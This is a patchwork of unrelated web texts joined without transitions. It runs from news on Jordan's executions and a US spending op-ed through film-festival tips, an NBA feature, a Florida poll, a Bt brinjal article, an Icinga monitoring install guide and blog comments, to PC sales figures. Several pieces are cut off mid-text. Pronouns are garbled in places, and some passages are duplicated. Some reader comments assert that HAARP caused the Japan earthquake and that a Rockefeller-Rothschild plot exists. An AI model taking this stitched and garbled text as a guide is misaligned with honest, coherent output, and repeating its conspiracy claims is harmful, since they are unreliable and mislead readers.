Previously, Jordan had executed 11 people in December 2014, in cases involving murder. This ended what had been a de facto eight-year moratorium on the death penalty, the international group Human Rights Watch said at the time.
The rights group Amnesty International said the “horrific scale and secrecy” surrounding Saturday's executions was shocking.
“This is a major step backward for both Jordan and efforts to end the death penalty, a senseless and ineffective means of administering justice,” said Samah Hadid, deputy director of the London-based group's regional office in Beirut.
The key is fiscal year 2009 -- and who you blame for it. By any measure, spending popped that year. If you're looking at raw dollars, it rose by $535 billion. And “the 2009 fiscal year,” writes Market Watch's Rex Nutting, “which Republicans count as part of Obama's legacy, began four months before Obama moved into the White House.”
That's true: The federal fiscal year stretches, somewhat weirdly, from October to September. So fiscal year 2009 began in October 2008.
And that's the point of Nutting's analysis: if you attribute most of fiscal year 2009 to George W. Bush then, after adjusting for inflation, federal spending under Obama has actually dropped by 0.1 percent. Politifact checked the numbers and agreed: “Using raw dollars, Obama did oversee the lowest annual increases in spending of any president in 60 years,” they write. “Using inflation-adjusted dollars, Obama had the second-lowest increase -- in fact, they actually presided over a decrease.” Here's Nutting's graph:
But I'd point out that this entire conversation is nonsense. So far, we haven't mentioned the only fact that really matters, which is that the economy began to collapse in late-2008, and continued to crater through much of 2009. Or, as Donald Marron, director of the Tax Policy Center, puts it, “the real issue is that 2009 is an anomaly driven by crisis.”
That there's an implicit taunt in this debate just goes to show how blinkered our fiscal conversation has really become. It was proper that spending jumped in 2009. If the Ghost of Ronald Reagan had occupied the Oval Office, spending would have jumped in 2009. That's just what happens when you hit a once-in-a-generation recession.
It is proper that, since 2009, spending has remained high in order to support a badly wounded economy and help unemployed workers and struggling families. The question isn't which president to blame for elevated spending in 2009 -- the blame there goes to the financial crisis, though Republicans conveniently forget that in order to score points. The question is where should spending be now?
”Obama chose not to reverse that elevated level of spending,” writes Jim Pethokoukis, a blogger for the conservative American Enterprise Institute, “thus he, along with congressional Democrats, are responsible for it. Only by establishing 2009 as the new baseline, something Republican budget hawks like Paul Ryan feared would happen, does Obama come off looking like a tightwad. Obama has turned a one-off surge in spending due to the Great Recession into their permanent New Normal through 2016 and beyond.”
That last line, by the way, isn't true. Obama's budget plans to bring spending down to 22.5 percent of GDP in 2016 -- which is about where it was in the Reagan years, and our demographics are worse now than they were then. But Pethokoukis's broader point is correct: The real debate here is what spending should have been in 2010 and 2011.
The Obama administration wanted it to be higher. After all, unemployment rose through 2010, and remains high today. It has proposed a raft of additional stimulus bills since 2009. Republicans in Congress, however, refused to pass most of their plans. Properly understood, the fact that inflation-adjusted spending has fallen since fiscal year 2009 is the result of Republican obstruction in Congress. That Democrats are now crowing about these numbers -- the DNC is e-mailing them around -- and that Republicans are now viciously disputing them is an embarrassment to both sides. You could as easily imagine Democrats lamenting these numbers as evidence of our failed policies and Republicans celebrating them as evidence of their congressional successes.
But Republicans don't want to admit that they bear substantial responsibility for the economic policy of the last few years. If they did, then it would be hard to argue that the economy's performance in 2010 and 2011 is all Obama's fault. And the Obama administration doesn't want to clearly say that we should have been spending more in recent years, even if that's what they believe, and what they proposed, because it polls poorly. And so here we are.
Related: Doing the math on Obama — and Bush's -- deficits.
Being an indie filmmaker can feel a lot like being a juggler with too many balls at times.
While making your film, it's hard enough to handle the creative process intertwined with the logistic involved, you also have to start building a list of film festivals, making sure you hit their deadlines and requirements to be considered.
Most of the time, we stop there: trying to get into a film festival.
But that's far from being done.
Once you get into a film festival, you better have a plan, or your days/week will go by before you realize it, and your window of opportunity will close.
With their 20+ years of experience on all stages of the spectrum, filmmaker, producer and Raindance Film Festival founder Elliot Grove shares 5 tips to help you ensure that you will make the most out of your time at a film festival.
Enjoy:
(This article was first published on Raindance.org)
Filmmaker: Maximise Your Film Festival – 5 Essentials
“You've spent a fortune applying to film festivals. I know this because I do this with my movies. You've had a series of rejections – and do they sting. I've been turned down by dozens of film festivals with my various projects. Now you've finally got accepted to a film festival. Congratulations! You plunk down your last chunk of change and book travel and accommodation to a festival screening. Once there, how do you maximise your festival attendance.
Here's what I have noticed fimmakers attending Raindance have done to make their screening and their attendance a standout.
1. Make connections
Make no exception – the number one reason you go to a film festival is to make connections and these happen on several different levels, and to access each you will need different skills.
your screening audience – getting live feedback from a room full of strangers is an experience that you cannot buy. Whether they laugh at the right place, or laugh at all are lessons you'll carry for the rest of your career. Of course, applause at the end of the screening is a great added bonus too.
– getting live feedback from a room full of strangers is an experience that you cannot buy. Whether they laugh at the right place, or laugh at all are lessons you'll carry for the rest of your career. Of course, applause at the end of the screening is a great added bonus too. fellow filmmakers – learning from your filmmaking colleagues is a sure-fire way to gain valuable knowledge. They won't teach these tips at any film school.
– learning from your filmmaking colleagues is a sure-fire way to gain valuable knowledge. They won't teach these tips at any film school. attending film professionals – the filmmaking industry is a people industry. Building relationships with industry professionals is much easier at a film festival. Don't ignore this valuable opportunity.
2. Promoting your film and yourself
Learning the art of self-promotion is an important skill. Start the buzz.
business cards – consider a business card as a micro poster about you. Remember to keep the card's back clean and matt so people can write notes.
– consider a business card as a micro poster about you. Remember to keep the card's back clean and matt so people can write notes. lobby cards – ideally postcard and letter size with a brief synopsis and your contact details on the back. You will never know how much space is allocated for filmmakers' cards until you arrive.
– ideally postcard and letter size with a brief synopsis and your contact details on the back. You will never know how much space is allocated for filmmakers' cards until you arrive. your film's campaign image – the most important element of your promotion is an eye-catching visual image. Getting this right can be a series of trials and errors.
– the most important element of your promotion is an eye-catching visual image. Getting this right can be a series of trials and errors. using social media – this has become the essential skill filmmakers need to know. Learn how to devise and execute a memorable social media campaign – both for your film and for yourself.
– this has become the essential skill filmmakers need to know. Learn how to devise and execute a memorable social media campaign – both for your film and for yourself. film trailers – many people make their decision on whether or not they'll watch your film based on a 2 minute trailer. Try to convey the emotion of your film. Raindance's filmmaker-in-residence Christian Bell made a stunning trailer of Deadly Virtues seen over 200,000 times. Note the eye-catching image as well.
3. Getting press for your film
The art of getting press is another filmmaker essentially no film school in the world teaches you. Press is the life-blood that drives your fim to viewers. Without viewers your film will end up in a graveyard filled with the corpses of other films strangled by lack of publicity.
creating a press kit – a proper press kit contains all the story and production notes of your film. Successful press kits create their own unique story of the film, almost the written equivalent of a good film trailer.
– a proper press kit contains all the story and production notes of your film. Successful press kits create their own unique story of the film, almost the written equivalent of a good film trailer. getting press – a press agent or publicist is another essential member of the team. Remember their task is to distibute your story, not to create it. You still have to create the story of your film.
– a press agent or publicist is another essential member of the team. Remember their task is to distibute your story, not to create it. You still have to create the story of your film. conducting an interview – have you ever been interviewed? Film festivals love to interview filmmakers. The interview is one of the key ways you can start the ‘buzz' for your film. It's a really good idea to prepare a list of questions and include it in your press kit so journalists get an idea of what topics to ask you.
4. Identifying your goals
Can you remember why you wanted to make a film in the first place?
creating a business plan – this simple document should lay out the ‘why' you want to make a film, contains bios on your key team members as well as the financial information. Make certain you throughly examine your distribution strategy – unless you don't care whether your investors ever get paid back.
– this simple document should lay out the ‘why' you want to make a film, contains bios on your key team members as well as the financial information. Make certain you throughly examine your distribution strategy – unless you don't care whether your investors ever get paid back. pitching successfully – the ability to succinctly and clearly verbalise your film's story is yet another essential skill. Practise on your friends so when you get to a film festival you'll be able to quickly and confidently answer the question: “What is your film about?”
5. Doing the deal
Isn't it great when a distributor rushes up to you after your screening and offers to take you out for dinner? Of course you politely decline because you know they are trying to get you out of the building away from their competitors, all of whom are trying to negotiate for your film.
Fade Out
It's easy enouygh for me to go on and on about how filmmakers attend film festivals. what have I missed out? Do me a big favour and stick your thoughts and comments in the box below.
Happy Filmmaking.
—-
Elliot Grove founded Raindance as a thought experiment: Can you make a film with no money, no training and no experience, they asked? Elliot has produced over 150 short films, 5 feature films and has written eight scripts. They teach writers and producers in the UK, Europe, Japan and America. Elliot teaches several courses at Raindance including Lo To No Budget Filmmaking andWriter's Foundation Certificate.
OKLAHOMA CITY -- Chris Paul and Russell Westbrook couldn't be more opposite as basketball players. Paul is measured and cerebral. Westbrook is audacious and bull-headed. Paul is smooth, surgical and incisive. Westbrook is one big fast-twitch muscle, a cataclysmic nova whose gravitational pull can overwhelm a game.
Paul falls in the traditional category of what a point guard is. Westbrook has created a category all to himself. They both play the same position -- officially speaking -- but they run their teams in different ways. And in the absences of their All-Star teammates, both have found ways to carry them.
Paul and the Clippers have gone 8-5 since Blake Griffin's elbow surgery on Feb. 9. Westbrook and the Thunder have gone 6-3 since Kevin Durant's foot procedure on Feb. 22. Westbrook is on a remarkable triple-double binge, averaging 34.4 points, 10.9 rebounds and 11.9 assists in the nine games without Durant. Paul has scored more willingly than usual, averaging 20.2 points, 4.7 rebounds and 12.6 assists. The two square off in Oklahoma City as the Thunder host the Clippers on Wednesday night (8 ET, ESPN), with both teams in need of a win. And it will be the matchup of Paul and Westbrook that could ultimately decide it.
What's interesting about Paul and Westbrook is last season they were in the same shoes as Griffin and Durant. With Westbrook out all of January following an arthroscopic procedure on their knee, Durant evolved into the Slim Reaper, putting together a month of volcanic offense that helped win them the MVP. Likewise, with Paul out virtually all of January, Griffin obliterated the stereotypes surrounding their game and carried the Clippers.
For Westbrook, the experience of not playing not only humbled him, but also gave them the chance to step back and observe -- not just in how their own game fit alongside teammates, but in how Durant took the reins of their team and guided them. What have they learned about himself, though, in playing unfettered without Durant?
"Nothing really," Westbrook said. "Nothing I didn't know already about myself."
Paul's reputation has always been mostly sterling throughout the league. Despite a lack of postseason success, Paul is regarded as a master craftsman, the prototypical floor general who balances between taking over themselves and distributing to others. He's a reluctant scorer, and a brilliant facilitator.
Westbrook is different. Maybe because of the position that's listed next to their name, or the superstar teammate they share a spotlight with, he's never fit the conventional standards of some, thus remaining one of the most polarizing stars in the league.
Chris Paul has kept the Clippers in the hunt despite the loss of Blake Griffin to an elbow injury. Richard Mackson/USA TODAY Sports
But this time without Durant has not only allowed Westbrook to spread their wings offensively and play the role so many have always assumed he's coveted -- their usage rate is an astronomical 42.2 percent the last nine games -- but it's also resulted in the best PR he's ever had. Westbrook is showcasing what they can do as a lone wolf, and that their efforts to fit with Durant in the past have held back the individual wrecking ball that they can be. We're all witness to the full-on unfiltered Russell Westbrook Experience right now, with each 48-minute game an open field for them to roam free. The near-universal praise is something new for Westbrook, but he's not hanging newspaper clips in their bedroom or anything.
"For me, doesn't change my mindset, doesn't change anything," they said of the recognition. "People that know me, I'll be the same if I have a good game, bad game. If I play well, people are going to talk about me. If they love me, if they don't love me, I'm going to play the same way regardless. That's just what I've been doing. Sticking to it. Trusting what I do. Trusting the people in this building. It's the same for me."
Westbrook seems to always have drawn motivation from their critics, even turning friends into enemies to make sure that they constantly have someone to prove wrong. At least that's been the perception, something they actually disagree with.
"Says who?" Westbrook said when asked about using criticism as fuel.
"It's always seemed like that, maybe it wasn't fuel ... correct me if I'm wrong," a reporter responded.
"You're wrong," Westbrook said flatly. "I just compete, man. I compete. I compete every night regardless of what's going on, regardless of criticism. ... My job is to do that every single night, compete at a level that I don't think nobody else can do."
Westbrook's competitive spirit is what makes them special. They have a will to win that most can't match, a relentless motor that is charged with a tangible anger against their opponent. Without Durant, he's been backed into a corner and forced to answer the challenge of carrying their team to the postseason. After a November in which both Durant and Westbrook sat because of injuries that resulted in a 3-12 start, the Thunder have no room for error.
For both Paul and Westbrook, though, playing without their star teammate has created the required narrative to build an MVP candidacy. But when it comes to what's really important, to what matters, they know what their team needs, and it's more than they can give.
"If I play well people are going to talk about me. If they love me, if they don't love me, I'm going to play the same way regardless." Russell Westbrook
"We need Blake," Paul told reporters in Memphis recently. "Don't get it twisted: We need him, and we need them bad."
Paul had more of a cushion when Griffin went down. Some wondered whether the Clippers might slide enough to have their playoff position put in doubt, but that was quickly put to bed. It's not that Paul had to prove anything, but they did have to do some reminding. Starting with a Game 5 meltdown in OKC last postseason, Paul has seen their glimmering reputation take a few hits. Some wondered whether they were slipping out of their prime, if their best NBA years were already behind him. The last three weeks have pretty much shut up those doubters.
"With Blake, obviously we play a lot different because we can depend on him," Paul said. "With them being out, we definitely move the ball a lot more. Guys are finding themselves, too.
"I keep saying it is kind of similar to when I went out last year. The ball started hopping, and then when I came back, it started hopping even more."
What's interesting about the Westbrook/Paul-carrying-the-team dynamic, though, is the critique of Paul is that he's often too unwilling to score himself, that they defer too much. The critique of Westbrook is obviously the opposite.
But in this run in which they're flying solo, and they've been forced out of their comfort zones to carry their teams, they aren't doing one or the other. They're doing both. They're doing what's necessary. They're doing what they're supposed to do.
A Breitbart/Gravis poll conducted in Florida this week before Friday's announcement that the FBI is reopening its investigation into Democratic nominee Hillary Clinton's use of a private email server while Secretary of State shows the race in the Sunshine State is a statistical tie between Clinton and GOP nominee Donald Trump.
The poll, conducted over Tuesday, October 25 and Wednesday, October 26, shows Hillary Clinton leading Donald Trump by one point, 48 percent to 47 percent. Libertarian candidate Gary Johnson had only one percent support, and three percent of voters were undecided.
The poll of 1,301 registered voters across Florida have a 2.7 percent margin of error. The one point differential between Clinton and Trump is within that margin of error.
Floridians who responded to the poll had strong views on the direction of the country, Obamacare, immigration, and refugees.
Fifty-five percent want the next president to change the direction of the country and pursue new policies, while 38 percent want to continue Barack Obama's policies.
A whopping 68 percent disapprove of Hillary Clinton's proposals to increase the number of Syrian refugees arriving in the United States by more than 500 percent, from 10,000 in 2016 to 65,000 in 2017. Only 19 percent approve of Clinton's proposals to increase the number of Syrian refugees. In the latest national poll conducted by Breitbart/Gravis, 63 percent oppose increasing the number of Syrian refugees, while 26 percent approve of Clinton's proposals to increase that number.
Fifty-two percent do not believe that Syrian refugees arriving in the United States have been subjected to the most rigorous security vetting, as the Obama Administration claims, while 33 percent believe the Obama administration's claims.
Fifty percent agree with Donald Trump that NAFTA, the North American Free Trade Agreement, is the worst trade deal in modern American history, and that TPP, the TransPacific Partnership, is almost as bad. Twenty-eight percent disagree.
Fifty-five percent say Obamacare, the Affordable Care Act, has not been a success, while 33 percent say it is a success.
Doug Kaplan, managing partner of Gravis Marketing, which this week also conducted a North Carolina poll showing a statistical tie between Donald Trump and Hillary Clinton, tells Breitbart News, “Trump could win both states. They have made an amazing comeback.”
“I do want to say in Nevada, Florida, and North Carolina, if it's close ground game matter, Secretary Clinton still has the advantage because of their ground game,” Kaplan, a resident of Florida, adds.
“In my state of Florida, Hillary has a built-in advantage of two points based on their organization,” they add.
The results of this poll are likely to be overshadowed by reaction to the stunning news announced Friday afternoon that the FBI is reopening the investigation of Hillary Clinton's emails.
In the Senate race between incumbent Sen. Marco Rubio (R-FL), and challenger Rep. Patrick Murphy (D-FL), the poll shows the two men are tied at 46 percent each.
The Real Clear Politics average of polls shows Rubio with a 5.6 percent lead over Murphy.
FL Oct 27 v2 (1) by Breitbart News on Scribd
GM Bt brinjal fails for second year in Bangladesh
GM plants either died out prematurely or fruited insignificantly compared to the locally available varieties
The Bangladesh Agricultural Research Institute (BARI), which is distributing Bt brinjal saplings, must cease this cruel experiment at the expense of Bangladeshi farmers. The chief promoter of the failed GM Bt brinjal, BARI director general Rafiqul Islam Mondol, should resign.
Bt brinjal was found to be toxic in Mahyco's (subsidiary of Monsanto) own tests.
—
Bt brinjal turns out to be ‘upset case' for farmers
New Age (Bangladesh), March 21, 2015
http://newagebd.net/105070/bt-brinjal-turns-out-to-be-upset-case-for-farmers/#sthash.CmJMx3w3.krtNeqob.dpbs
The cultivation of genetically engineered Bt Brinjal in the country's several districts has cost the farmers their fortunes again this year as the plants have either died out prematurely or fruited very insignificantly compared to the locally available varieties, reports United News of Bangladesh.
Spot visits to 12 Bt Brinjal fields in Manikganj, Narsingdi and Comilla over the last one month hardly found any living or properly fruiting plant on those fields.
BARI Bt Brinjal 2 (Bt-Nayantara) and BARI Bt Brinjal 3 (Bt-Kajla) were cultivated by four farmers at Pouli village in Manikganj Sadar under the supervision of Bangladesh Agricultural Research Institute (BARI). The fields belonging to Afzal Hossain and Md Mannaf have turned out to be an ultimate upset as each of the two fields appears half-barren as one looks at.
‘We've removed most of the plants after those had died about 15 days ago. The officers (BARI officials) told us to do so to prevent the spread of the disease. Despite that the rest of the plants are dying out in numbers every day,' Mannaf's wife Lovely Begum said.
Although only a few of the Bt Brinjal plants have died so far in two other fields cultivated by Boltu Miah and Abul Hossain, who are brothers, of the same village, the fruiting of the plants is nowhere near the satisfactory level, said Lal Chand, father of the two brothers.
The two Bt Brinjal varieties were also cultivated by three farmers at Dhanua village in Shibpur upazila of Narsingdi. All of them ended up miserably.
Md Abul Hayat, who is respected as a successful farmer in the locality, said, ‘Most of the saplings (of Bt Brinjal) have died. The plants are prone to diseases. The officials said it's due to bacterial attack and prompted by irrigation and soil-type.'
‘If irrigation and soil-type had been a problem, why the local brinjal plants on my other field had not been affected?' they questioned pointing to a brinjal field beside their Bt Brinjal one.
‘One can't believe that just one month ago, the plants on my field (Bt Brinjal) were the most good looking ones among all the brinjal fields in Shibpur. They (officials) came to my field and took photos and videos of the plants at that time,' Hayat noted.
The sight of the Bt Brinjal field of Md Alamgir of neighbouring Baghab village in the upazila was more pathetic. ‘Many of the saplings had died at an earlier stage… one month into the planting. The officials replaced the dead plants with fresh ones but those have died too,' they said.
Harun Mirza, Dilip Kumar Das and Mohammad Ali of Burichong upazila in Comilla planted BARI Bt Brinjal 1 (Bt-Uttara) and BARI Bt Brinjal 4 (Bt-ISD 006) on about 18-20 decimal plots. All the three claimed that around 150-200 of the 500-700 saplings that were provided to them died earlier within one month's of the planting.
The fresh plants that replaced the dead plants also could not survive, while the most of the rest are also dying out, they added.
Mohammad Ali of Nimsar village in the upazila also showed several plants of BARI Bt Brinjal 4 variety that were affected by Brinjal Fruit and Shoot Borer (BFSB) insects. ‘We were told that these brinjal varieties are resistant to Phol of Doga Chidrokari Poka (BFSB), but the plants on my field have come under its attack,' they said while showing an affected plant.
Meanwhile, farmers in Sherpur, Mymensingh, Rangpur, Dinajpur, Rajshahi, Pabna, Jessore, Gazipur and Tangail districts shared similar experiences with this UNB correspondent when they were contacted over phone.
At least 25-150 of the Bt Brinjal plants died on each of the Bt Brinjal fields in these districts. The dead plants also include some of BARI Bt Brinjal 5 variety that was cultivated in Dinajpur.
Md Haminur Rahman and Md Mobarak Hossain of Sherpur Sadar upazila said they have harvested 8-10 maunds of Bt Brinjal three months since the planting. It is less than half the amount that could by this timeframe be harvested from a local brinjal field of the same size, they noted.
Ramzan Ali of Jhikargachha upazila in Jessore said most of the Bt Brinjal plants in their field had died.
Asked about the dying of Bt Brinjal plants in the districts mentioned above, BARI director general Rafiqul Islam Mondol said, ‘We didn't claim that the Bt Brinjal plants will not be affected by diseases. Our claim was that Bt Brinjal is resistant to BFSB.'
Asked about the BFSB infestation in at least one Bt Brinjal field in Comilla, they said, ‘I don't have any such information. One or two non-Bt plants can be mistakenly grouped with the Bt plants in that field.'
Preface
Icinga is a fork of Nagios monitoring system. There are lots of changes and upgrades compared to Nagios, especially in version 2. The main visible difference is UI which is built on ext js. Other significant differences are in hosts and services definitions (it will be covered in part 2).
For this tutorial we're going to use Digital Ocean smallest droplet with installed Debian 7.8.
Prerequisits
We'll use debmon repository
At the end of file “/etc/apt/source.list” add the following entry:
#ICINGA deb http://debmon.org/debmon debmon-wheezy main 1 2 #ICINGA deb http : //debmon.org/debmon debmon-wheezy main
Repository key:
wget -O - http://debmon.org/debmon/repo.key 2>/dev/null | apt-key add - 1 wget - O - http : / / debmon .org / debmon / repo .key 2 > / dev / null | apt - key add -
Now run:
apt-get update && apt-get -y upgrade 1 apt - get update && apt - get - y upgrade
If there was a kernel upgrade (like in my case), reboot the server before proceeding to the next step.
Icinga and nagios plugins
apt-get install icinga2 nagios-plugins -y 1 apt - get install icinga2 nagios - plugins - y
root@icinga-mon:~# /etc/init.d/icinga2 start [ ok ] checking Icinga2 configuration. [ ok ] Starting icinga2 monitoring daemon: icinga2. root@icinga-mon:~# 1 2 3 4 root @ icinga - mon : ~ # /etc/init.d/icinga2 start [ ok ] checking Icinga2 configuration . [ ok ] Starting icinga2 monitoring daemon : icinga2 . root @ icinga - mon : ~ #
Starting the serviceWe also want icinga integration with the database.
Install MySQL and IDO-MySQL
apt-get install mysql-server aptitude install icinga2-ido-mysql -y 1 2 apt - get install mysql - server aptitude install icinga2 - ido - mysql - y
And enable manually ido-mysql:
root@icinga-mon:/etc/icinga2# icinga2 feature enable ido-mysql Enabling feature ido-mysql. Make sure to restart Icinga 2 for these changes to take effect. root@icinga-mon:/etc/icinga2# /etc/init.d/icinga2 restart 1 2 3 root @ icinga - mon : / etc / icinga2 # icinga2 feature enable ido-mysql Enabling feature ido - mysql . Make sure to restart Icinga 2 for these changes to take effect . root @ icinga - mon : / etc / icinga2 # /etc/init.d/icinga2 restart
Icinga Web
apt-get install icinga-web -y 1 apt - get install icinga - web - y
Choose dbconfig-common for db setup and it will prompt you for web interface password.
After the setup icinga-web will bi available on: http://SERVER/icinga-web/
username:root
password: (set during the installation)
There seems to be a bug in icinga-web package from debmon.
After checking with chrome inspect tool, the url with this issue was:
http://SERVER/icinga-web/modules/cronks/reloadStatus/json?_dc=1426770390818
PDO Connection Error: SQLSTATE[28000] [1045] Access denied for user 'icinga'@'localhost' (using password: YES) 1 PDO Connection Error : SQLSTATE [ 28000 ] [ 1045 ] Access denied for user 'icinga' @ 'localhost' ( using password : YES )
The issue is in config file that is (for some reason) used for db connection:
/usr/share/icinga-web/app/config/databases.xml 1 / usr / share / icinga - web / app / config / databases . xml
Line 39:
Change with data from:
/etc/icinga-web/conf.d/database-web.xml 1 / etc / icinga - web / conf . d / database - web . xml
Line 90:
Change with data from:
/etc/icinga2/features-available/ido-mysql.conf 1 / etc / icinga2 / features - available / ido - mysql . conf
Ingraph
apt-get install ingraph -y 1 apt - get install ingraph - y
In the next part of this tutorial we'll go through configuration for new hosts and services.
Share this: Facebook
Google
Twitter
Reddit
Pocket
Email
Print
Like this: Like Loading...
READER COMMENTS ON
"'Green News Report' - March 15, 2011"
(11 Responses so far...)
COMMENT #1 [Permalink]
... brian said on 3/15/2011 @ 2:41 pm PT...
http://www.countercurrents.org/head150311.htm one quake, one tsunami, two nuke plants...and japan
Imagine if it hadnt been japan!
Obama is still pushing the nuclear option...and you thought they were clever. A crisis is an oppportunity so they say in china, well here is an opportunity to get rid of nucler power forever. esp in quake zones. If rich tech-savvy quake-hardened tsunami-familiar japan is traumatised , how would any other nation fare?
COMMENT #2 [Permalink]
... brian said on 3/15/2011 @ 3:12 pm PT...
some god news:
'The use of seawater indicates how serious the situation is, since it blocks any further commercial use of the reactors. They have been written off in a last-ditch effort to prevent an even greater disaster.' and some bad:
'By Monday morning Japan time it was being reported that a total of six reactors along Japan's northeast Pacific coast were experiencing breakdowns in their cooling systems, with technicians forced to declare states of emergency or use emergency backups. Another six nuclear reactors have been shut down as a precautionary measure while they are inspected for earthquake damage.'
http://www.wsws.org/arti...1/mar2011/pers-m14.shtml
COMMENT #3 [Permalink]
... brian said on 3/15/2011 @ 3:14 pm PT...
'The nuclear power industry in Japan, as throughout the world, is conducted on the basis of private profit, giving the corporate owners, suppliers and operators a continuing incentive to cut corners on safety in order to fatten their bottom line—especially since special government waivers free the industry of financial liability in the event of a catastrophe. The Fukushima reactor is based on a 40-year-old design by General Electric, now much less than state-of-the art. This outmoded design is replicated at a half dozen other nuclear facilities in Japan and at least 21 in the United States, including the Toms River, New Jersey power reactor, 55 miles east of Philadelphia and 90 miles south of Manhattan. The operator of the Fukushima complex, Tokyo Electric Power (TEPCO), has a poor record of compliance with safety procedures. In 2003, all 17 of its nuclear plants were shut down temporarily in a scandal over falsified inspection reports. Another scandal over falsified data emerged in 2006.'
COMMENT #4 [Permalink]
... brian said on 3/15/2011 @ 3:17 pm PT...
did u know:
'Hamaoka plant, just 100 miles southwest of Tokyo, which perches on an active fault line' another disaster waiting to happen. Who are the corporate/scientific lion tamers who thought: lets perch our nuke reactor on an active fault line?
COMMENT #5 [Permalink]
... Ernest A. Canning said on 3/15/2011 @ 4:04 pm PT...
Sad, but Kudlow's elevating economics above humanity is but a reflection of the vice-into-virtue philosophy of the billionaire class.
COMMENT #6 [Permalink]
... Ernest A. Canning said on 3/15/2011 @ 4:06 pm PT...
Worthwhile read in this Los Angeles Times editorial, Nuclear fails the test.
COMMENT #7 [Permalink]
... plunger said on 3/15/2011 @ 5:30 pm PT...
At present, the nuclear disaster scale goes from 1-7. This one is going to be an 8.
COMMENT #8 [Permalink]
... ghostof911 said on 3/15/2011 @ 5:59 pm PT...
plunger To date, Fukushima has been rated 6. Chernobyl had been rated 7. From the LAT link Like all U.S. and Japanese nuclear plants, they're built to withstand the largest earthquake considered likely in their regions, based on fault analyses. They are not designed to withstand a human-made disruption which can exceed naturally occurring limits. HAARP technology has demonstrated its ability to cause disruptions of great magnitude. There is also evidence (see Kudlow) that individuals can posess the insane cruelty needed to unleash a weapon like HAARP to cause unimaginable suffering on others. The only question left is, would anyone actually do it?
COMMENT #9 [Permalink]
... zapkitty said on 3/15/2011 @ 6:38 pm PT...
FDL reporting another fire and explosion at #4... http://my.firedoglake.co...ion-at-unit-4-fuel-pond/ ... AP quoted as saying that TEP indicates that the first fire at #4 was never actually extinguished.
COMMENT #10 [Permalink]
... plunger said on 3/15/2011 @ 6:44 pm PT...
David Rockefeller has stated their wishes throughout their lifetime (Eugenics, Communism, etc). I have no reason not to assume that all of the unrest and upheaval we are seeing was on their bucket list, and at their advancing age, are being expedited to please them and their City Of London and Rothschild co-conspirators. The only way to get the people to beg for a new "order" is to cause untold disorder. I simply choose not to attribute anything to coincidence. Big Dan has documented the potential of HAARP's role extensively: http://bigdanblogger.blo...-news-march-12-2011.html http://bigdanblogger.blo...-news-march-15-2011.html From my perspective, Karl Rove is the Architect - the key strategist for the GHW/Rockefeller conspiracy - and has been calling the tune for a decade: http://www.plungerspeaks.blogspot.com/ I'm inclined to believe the opposite of whatever the "news" says, and I'm proven correct more often than not. 150,000 people marched on the capitol in Wisconsin, and according to the news coverage it received - it never happened. An earth quake and tsunami prevented its coverage. What a coincidence.
COMMENT #11 [Permalink]
... plunger said on 3/16/2011 @ 7:25 am PT...
Gartner and IDC have both turned in their estimates for how many PCs were sold in Q4 2016, and the data isn't good no matter where you look. While the two companies are characterizing their findings differently — IDC calls its 1.6% decline a “stabilization,” while Gartner charted a 3.7% decline compared to Q4 2015 and called it as such — neither has much in the way of positive forecasting to soften their conclusions.
The numbers: 72.6 million PCs were sold in Q4 2016 and 269.7 million PCs were sold throughout the year, Gartner reports. That's a 6.2% decline compared to 2015, and the fifth straight year of decline. Total PC sales in 2011, for comparison, were 365 million units, or 1.35x higher than they are today. 269.7 million PCs is still a huge number of computers, but wiping out nearly 100 million unit shipments in just five years isn't good for any market.
“Stagnation in the PC market continued into the fourth quarter of 2016 as holiday sales were generally weak due to the fundamental change in PC buying behavior,” said Mikako Kitagawa, principal analyst at Gartner. “The broad PC market has been static as technology improvements have not been sufficient to drive real market growth. There have been innovative form factors like 2-in-1s and thin and light notebooks, as well as technology improvements, such as longer battery life. This end of the market has grown fast, led by engaged PC users who put high priority on PCs. However, the market driven by PC enthusiasts is not big enough to drive overall market growth.”
“There is the other side of the PC market, where PCs are infrequently used,” Kitagawa continued. “Consumers in this segment have high dependency on smartphones, so they stretch PC life cycles longer. This side of the market is much bigger than the PC enthusiast segment; thus, steep declines in the infrequent PC user market offset the fast growth of the PC enthusiast market.”
According to Gartner, Lenovo led in overall unit shipments, followed by HP and Dell. Lenovo, HP, Dell, and Apple all gained market share in 2016 while Asus and Acer both lost share. This was particularly bruising for Asus, whose Q4 2016 shipments declined by 8.5% compared to the same period a year earlier. According to Gartner, Asus' US shipments fell a staggering 48% in Q4 2016 compared to the same period in 2015. The organization expects the PC industry to decline for at least the next year.
Meanwhile, Q4 sales fell just 1.5% year-on-year, with annual PC shipments declining 5.7%, IDC reports. Where Gartner expects to see stagnation and falling sales, however, IDC is somewhat more positive.
“The fourth quarter results reinforce our expectations for market stabilization, and even some recovery,” said Loren Loverde, vice president, Personal Computing Trackers & Forecasting. “The contraction in traditional PC shipments experienced over the past five years finally appears to be giving way as users move to update systems. We have a good opportunity for traditional PC growth in commercial markets, while the consumer segment should also improve as it feels less pressure from slowing phone and tablet markets.”
“The U.S. PC market was able to pull off a strong last quarter of the year with impressive growth in the retail PC segment that surpassed expectations,” said Neha Mahajan, senior research analyst, Devices & Displays. “Although this might signal regained consumer confidence in the PC market, with most of the sales being driven by aggressive promotions in the holiday season, it needs to be seen how much of the real demand is carried forward in the coming quarters.”
We've been wondering if Apple's Mac shipments took a hit on the back of all the negative press the MacBook Pro accrued in Q4. But so far the answer seems to be “no.” IDC thinks Apple shipped 0.1% fewer units in Q4 2016 compared with Q4 2015, but that's a blip on the overall radar. It's still possible that the MacBook Pro will ship in lower numbers over the long run after the faithful snapped them up in Q4, but so far Apple's decision to dump backwards compatibility (sans dongles) doesn't seem to have cost them any sales.
As for which firm is more likely to be correct about the shape of the PC market in 2017, frankly I agree more with Gartner, and its predictions of at least one more year of stagnation or contraction. For the past few years, companies like Intel have confidently talked about upgrade cycles that would push consumers to begin replacing their PC hardware. In the beginning, this was a 2-3 year cycle. It eventually became 4-5 years, then 5-6. I've seen companies talk about eight-year upgrade cycles. The arguments, at this point, ring hollow.
This is not to suggest that the PC industry will decline forever. Rather, it suggests that the PC market is bifurcating into multiple distinct groups. First, you have power users, whether that means high-end gaming enthusiast or professional workstation customer. Next, you have customers who prioritize gains in battery life or weight reductions. These two groups are both concerned with performance, but they define the term differently and care about different features as a result.
Finally, you've got customers who increasingly treat their personal computer as if it's on a similar replacement cycle to their refrigerator or washing machine. Nobody runs out and buys a washing machine because the 2017 models have amazing killer features, nobody cares about smart toasters, and the ugly truth is, the mass market doesn't care much about PC hardware, either. Features like SSDs or improved 4K playback support will attract people on the edges. But very few people in the mass market are rushing out to buy new hardware because Intel, AMD, or Asus added those capabilities to existing products.
